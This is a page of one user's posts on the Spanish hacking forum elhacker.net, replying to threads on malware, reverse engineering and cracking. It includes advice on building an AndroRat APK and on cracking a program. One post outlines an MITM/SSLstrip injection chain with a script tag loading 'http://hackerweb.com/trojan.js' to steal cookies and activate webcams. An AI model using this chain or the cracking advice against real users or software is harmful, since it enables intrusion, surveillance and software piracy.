elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 ... 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 [55] 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 ... 313
541  Seguridad Informática / Análisis y Diseño de Malware / Re: Problema con Androrat en: 5 Mayo 2014, 06:36 am
hola a tod@s.
Estoy buscando algo de ayuda.
El problema que tengo es que cuando le doy a generar la apk de da unos error de rutas y no consigo solucionarlos.
por ejemplo.
[11:21:36 ] Unable to access jarfile C:\mli\ANDROID\AndroRat Binder\apk\apktool.jar
[11:21:36 ] Injecting AndroRat Source.
[11:21:37 ] No se pudo encontrar el archivo 'C:\mli\ANDROID\AndroRat Binder\apk\Aquarium_1.0\AndroidManifest.xml'.
y la verdad que de hay no salgo.
Gracias

- Verificar la existencia de esos PATH
- Si están verificar la existencia de sus archivos como AndroiManifest y apktool.jar

Citar
Unable to access jarfile

Es un poco de Inglés nada más, y si no sabes tienes a google translate.
542  Seguridad Informática / Análisis y Diseño de Malware / Re: [APORTE] 9 métodos de auto-inicio en un solo script en: 5 Mayo 2014, 06:31 am
Lo acabo de ver y no entiendo como los usuarios no se toman la molestia de dar las gracias, es una increíble recopilación, yo conocía tres métodos pero nada mejor tener todos los métodos en un solo post, sería ideal una chincheta o ponerlo en algún lugar de fácil recuerdo. Muchas gracias.

PD: Sería ideal especificar los permisos requeridos para cada autorranque, como por ejemplo HKLM requiere permisos de administrador a diferencia de HKCU.
543  Programación / Ingeniería Inversa / Re: Desempacar L2.exe en: 1 Mayo 2014, 03:50 am
Simplemente comienza con el que desees depurar, así de sencillo y isDebuggerPresent es una API de Windows si no sabes eso ni sueñes romper la seguridad de Themida, saludos.
544  Seguridad Informática / Análisis y Diseño de Malware / Re: deteccion de server en: 30 Abril 2014, 03:44 am
Si y muy posible y bajo tu permiso. Kaspersky trabaja como comunidad, enviando los archivos sospechosos (muestras) a los laboratorios de Kaspersky, si mal no me equivoco es una funcionalidad preguntada al momento de instalar el AV. No recuerdo el nombre, pero en configuraciones está.
545  Programación / Ingeniería Inversa / Re: como aprender a descifrar. en: 30 Abril 2014, 03:40 am
Para obtener el algoritmo de cifrado requieres de Ing. Inversa (depurar). EJ: Crear un programa que pida contraseña al arrancar:

String clave;
printf("Por favor introduzca una contraseña");
clave = input();
if(clave == "hola123"){
 main (){
 .....
 ...
 }
}else{
prinf("Acceso denegado");
}

como puedes ver el seudocódigo solicitará una contraseña y será verificada, generando bifurcaciones del flujo del programa. Si reversas el programa podrías localizar el string "hola123", ahora cifrados conocidos, requiere simplemente reversearlos para conocer su estructura a nivel de ensamblador.

te recomendaría el F.A.Q

PD: Para winrar, el algoritmo no sé como se constituye pero la clave es la encargada de descifrar. podría ser "contraseña" xor bytes del archivo.
546  Programación / Ingeniería Inversa / Re: como aprender a descifrar. en: 28 Abril 2014, 14:24 pm
Hola, bueno si desconoces el crifrado, es imposible descifrar los datos, es similar al proceso de generación de serial, sin el algoritmo de cifrado no podrás descifrar. Siguiendo con la similitud, aun en ambos casos el algoritmo de cifrado/generación de serial debe ser un cifrado simétrico para poder ser decifrado sin fuerza bruta. Si el código C es el cifrado, debes invertir las operaciones
Ej: si suma, debe restar, si multiplica, debe dividir (son simples ideas en este mundo siempre todo es variable)
547  Informática / Electrónica / Re: ¿Que maquina para reballing me recomiendan? en: 25 Abril 2014, 03:29 am
He visto gente que lo hace con secadores de pelo.

Salud.

El usuario solicita una opinión sobre reballing no alternativas a overflow
548  Foros Generales / Foro Libre / Re: Apresentacion en: 22 Abril 2014, 03:36 am
legal kara, fica confortable no foro, a gente se fala!
549  Programación / Ingeniería Inversa / Re: Ayuda a hacer un crack a un programa en: 18 Abril 2014, 17:57 pm
Eso no ayuda en nada, debes mostrar tus avances, posibles address de importancia, lenguaje de programación, funciones o métodos (de acuerdo al lenguaje) que podrían apuntar a una validación.
550  Seguridad Informática / Análisis y Diseño de Malware / Re: Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan? en: 13 Abril 2014, 19:34 pm
Si mal no me equivoco es un troyano en javascript, la idea es combinarlo con un MITM + SSLSTRIP + inyección de código + Beef XSS (especie de troyano en javascript) o de forma alternativa ser dueño de una web popular o desfacear una y agregar el javascript de Beef XSS, la idea es así:
- El usuario ingresa a una página
- A través de MITM + SSLSTRIP toda página aun HTTPS se agrega un código:
<script type=java/script src=http://hackerweb.com/trojan.js> (no recuerdo bien)
- Este troyano, detecta el navegador, sistema operativo, permite agregar un iframe, activar la webcam a través de adobeflash player, stealer cookie, etc.
Lo bueno es que al ser javascript la ofuscación es fácil de hacer lo cual facilitaría el bypass de AV, desconozco si se realiza un análisis heurístico a javascript
Páginas: 1 ... 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 [55] 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 ... 313
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines